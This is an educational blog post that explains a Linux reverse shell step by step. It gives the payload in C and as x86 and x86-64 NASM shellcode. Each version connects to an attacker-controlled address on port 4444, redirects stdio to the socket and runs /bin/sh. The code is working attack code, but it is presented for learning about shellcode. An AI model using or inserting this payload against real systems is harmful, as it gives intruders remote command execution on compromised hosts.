A recent conversation with a coworker inspired me to start putting together a series of blog posts to examine what it is that shellcode does. In the first installment, I’ll dissect the basic reverse shell.

First, a couple of reminders: shellcode is the machine code that is injected into the flow of a program as the result of an exploit. It generally must be position independent as you can’t usually control where it will be loaded in memory. A reverse shell initiates a TCP connection from the compromised host back to a host under the control of the attacker. It then launches a shell with which the attacker can interact.

Reverse Shell in C

Let’s examine a basic reverse shell in C. Error handling is elided, both for the space in this post, and because most shellcode is not going to have error handling.

 1#include <sys/types.h>
 2#include <sys/socket.h>
 3#include <netinet/in.h>
 4#include <arpa/inet.h>
 5#include <unistd.h>
 6
 7void reverse_shell() {
 8  /* Allocate a socket for IPv4/TCP (1) */
 9  int sock = socket(AF_INET, SOCK_STREAM, 0);
10
11  /* Setup the connection structure. (2) */
12  struct sockaddr_in sin;
13  sin.sin_family = AF_INET;
14  sin.sin_port = htons(4444);
15
16  /* Parse the IP address (3) */
17  inet_pton(AF_INET, "192.168.22.33", &sin.sin_addr.s_addr);
18
19  /* Connect to the remote host (4) */
20  connect(sock, (struct sockaddr *)&sin, sizeof(struct sockaddr_in));
21
22  /* Duplicate the socket to STDIO (5) */
23  dup2(sock, STDIN_FILENO);
24  dup2(sock, STDOUT_FILENO);
25  dup2(sock, STDERR_FILENO);
26
27  /* Setup and execute a shell. (6) */
28  char *argv[] = {"/bin/sh", NULL};
29  execve("/bin/sh", argv, NULL);
30}

Reverse Shell Steps

As can be seen, there are approximately 6 steps in setting up a reverse shell. Once they are understood, this can be converted to proper shellcode.

  1. First we need to allocate a socket structure in the kernel with a call to socket. This is a wrapper for a system call (since it has effects in kernel space). On x86, this wraps a system call called socketcall, which is a single entry point for dispatching all socket-related system calls. On x86-64, the different socket system calls are actually distinct system calls, so this will call the socket system call. It needs to know the address family (AF_INET for IPv4) and the socket type (SOCK_STREAM for TCP, it would be SOCK_DGRAM for UDP). This returns an integer that is a file descriptor for the socket.
  2. Next, we need to setup a struct sockaddr_in, which includes the family (AF_INET again), and the port number in network byte order (big-endian).
  3. We also need to put the IP address into the structure. inet_pton can parse a string form into the struct. In a struct sockaddr_in, this is a 4 byte value, again in network byte order.
  4. We now have the full structure setup, so we can initiate a connection to the remote host using the already-created socket. This is done with a call to connect. Like socket, this is a wrapper for the socketcall system call on x86, and for a connect system call on x86-64.
  5. We want the shell to use our socket when it is handling standard input/output (stdio) functions. To do this, we duplicate the file descriptor from the socket to each of STDIN, STDOUT, STDERR. Like so many, dup2() is a thin wrapper around a system call.
  6. Finally, we setup the arguments for our shell, and launch it with execve, yet another system call. This one will replace the current binary image with the targeted binary (/bin/sh) and then execute it from the entry point. It will execute with its standard input, output, and error connected to the network socket.

Why not shellcode in C?

So, if we have a working function, why can’t we just use that as shellcode? Well, even if we compile position independent code (-pie -fPIE in gcc), this code will still have many library calls in it. In a normal program, this is no problem, as it will be linked with the C library and run fine. However, this relies on the loader doing the right thing, including the placement of the PLT and GOT. When we inject shellcode, we only inject the machine code, and don’t include any data areas necessary for the location of the GOT.

What about statically linking the C library to avoid all these problems? While that has the potential to work, any constants (like the strings for the IP address and the shell path) will be located in a different section of the binary, and so the code will be unable to reference those. (Unless we inject that section as well and fixup the relative addresses, but in that case, the complexity of our loader approaches the complexity of our entire shellcode.)

Reverse Shell in x86

My shellcode below will be written with the intent of being as clear as possible as a learning instrument. Consequently, it is neither the shortest possible shellcode, nor is it free of “bad characters” (null bytes, newlines, etc.). It is also written as NASM assembly.

 1; Do the steps to setup a socket (1)
 2; SYS_socket = 1
 3mov ebx, 1
 4; Setup the arguments to socket() on the stack.
 5push 0  ; Flags = 0
 6push 1  ; SOCK_STREAM = 1
 7push 2  ; AF_INET = 2
 8; Move a pointer to these values to ecx for socketcall.
 9mov ecx, esp
10; We're calling SYS_SOCKETCALL
11mov eax, 0x66
12; Get the socket
13int 0x80
14
15; Time to setup the struct sockaddr_in (2), (3)
16; push the address so it ends up in network byte order
17; 192.168.22.33 == 0xC0A81621
18push 0x2116a8c0
19; push the port as a short in network-byte order
20; 4444 = 0x115c
21mov ebx, 0x5c11
22push bx
23; push the address family, AF_INET = 2
24mov ebx, 0x2
25push bx
26
27; Let's establish the connection (4)
28; Save address of our struct
29mov ebx, esp
30; Push size of the struct
31push 0x10
32; Push address of the struct
33push ebx
34; Push the socketfd
35push eax
36; Put the pointer into ecx
37mov ecx, esp
38; We're calling SYS_CONNECT = 3 (via SYS_SOCKETCALL)
39mov ebx, 0x3
40; Preserve sockfd
41push eax
42; Call SYS_SOCKETCALL
43mov eax, 0x66
44; Make the connection
45int 0x80
46
47; Let's duplicate the FDs from our socket. (5)
48; Load the sockfd
49pop ebx
50; STDERR
51mov ecx, 2
52; Calling SYS_DUP2 = 0x3f
53mov eax, 0x3f
54; Syscall!
55int 0x80
56; mov to STDOUT
57dec ecx
58; Reload eax
59mov eax, 0x3f
60; Syscall!
61int 0x80
62; mov to STDIN
63dec ecx
64; Reload eax
65mov eax, 0x3f
66; Syscall!
67int 0x80
68
69; Now time to execve (6)
70; push "/bin/sh\0" on the stack
71push 0x68732f
72push 0x6e69622f
73; preserve filename
74mov ebx, esp
75; array of arguments
76xor eax, eax
77push eax
78push ebx
79; pointer to array in ecx
80mov ecx, esp
81; null envp
82xor edx, edx
83; call SYS_execve = 0xb
84mov eax, 0xb
85; execute the shell!
86int 0x80

Reverse Shell in x86-64

This will be very similar to the x86 shellcode, but adjusted for x86-64. I will use the proper x86-64 system calls and 64-bit registers where possible.

 1; Do the steps to setup a socket (1)
 2; Setup the arguments to socket() in appropriate registers
 3xor rdx, rdx  ; Flags = 0
 4mov rsi, 1    ; SOCK_STREAM = 1
 5mov rdi, 2    ; AF_INET = 2
 6; We're calling SYS_socket
 7mov rax, 41
 8; Get the socket
 9syscall
10
11; Time to setup the struct sockaddr_in (2), (3)
12; push the address so it ends up in network byte order
13; 192.168.22.33 == 0xC0A81621
14push 0x2116a8c0
15; push the port as a short in network-byte order
16; 4444 = 0x115c
17mov bx, 0x5c11
18push bx
19; push the address family, AF_INET = 2
20mov bx, 0x2
21push bx
22
23; Let's establish the connection (4)
24; Save address of our struct
25mov rsi, rsp
26; size of the struct
27mov rdx, 0x10
28; Our socket fd
29mov rdi, rax
30; Preserve sockfd
31push rax
32; Call SYS_connect
33mov rax, 42
34; Make the connection
35syscall
36
37; Let's duplicate the FDs from our socket. (5)
38; Load the sockfd
39pop rdi
40; STDERR
41mov rsi, 2
42; Calling SYS_dup2 = 0x21
43mov rax, 0x21
44; Syscall!
45syscall
46; mov to STDOUT
47dec rsi
48; Reload rdi
49mov rax, 0x21
50; Syscall!
51syscall
52; mov to STDIN
53dec rsi
54; Reload rdi
55mov rax, 0x21
56; Syscall!
57syscall
58
59; Now time to execve (6)
60; push "/bin/sh\0" on the stack
61push 0x68732f
62push 0x6e69622f
63; preserve filename
64mov rdi, rsp
65; array of arguments
66xor rdx, rdx
67push rdx
68push rdi
69; pointer to array in rsi
70mov rsi, rsp
71; call SYS_execve = 59
72mov rax, 59
73; execute the shell!
74syscall

Conclusion

The structural simularities between either assembly implementation and the C source code should be fairly evident. When I write shellcode, I usually write out the list of steps involved, then write a version in C, and finally translate to the assembly for the shellcode. I’m a bit of a control freak, so whenever I need custom shellcode, I got straight to the assembly.

Let me know if there’s a particular shellcode payload you’re interested in me covering or if you have feedback on the style or usefulness of these posts.